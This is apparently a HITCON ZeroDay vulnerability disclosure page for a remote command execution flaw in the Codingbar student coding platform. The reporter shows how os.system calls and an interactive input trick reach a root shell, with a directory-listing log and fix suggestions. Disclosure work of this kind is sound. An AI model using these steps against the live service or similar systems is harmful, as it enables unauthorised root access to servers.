Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-00796
- Vendor: 瑞比智慧科技股份有限公司
- Title: codingbar 系統漏洞
- Introduction: 可直接遠端執行系統命令及取的root
處理狀態
目前狀態
公開
Last Update : 2024/09/13
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2024/07/14 22:28:11 : 新提交 (由 鄉民 更新此狀態)
- 2024/07/16 10:28:06 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/08/12 17:05:00 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/08/12 17:05:00 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/08/12 17:05:00 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/13 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-00796
- 通報者:鄉民
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://app.codingbar.ai/student/course
敘述
任意可值行地方(包含課程及FreeCode)可import os,並透過os.system('%linux_command%')
IMG#0
使用註解並輸入#input()可輸入內容並os.system('su')可直接變成command line
範例中再跟目錄建立test資料夾
--------------output--------------
[cd ..]
[ls]
1720966420622
[cd ..]
[cd .]
[cd ..]
[ls]
00000
[cd ..]
[cd ..]
[ls]
自強基金會
[cd ..]
[cd ..]
[cd ..]
[cd ..]
[ls]
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
processWorkingDir
root
run
sbin
srv
sys
tmp
usr
var
[mkdir test]
[echo ------]
[ls]
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
processWorkingDir
root
run
sbin
srv
sys
test
tmp
usr
var
IMG#2
可直接修改root密碼
IMG#3
修補建議
防止os的跨越使用
給予伺服器權限較低的使用者並設定root密碼
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。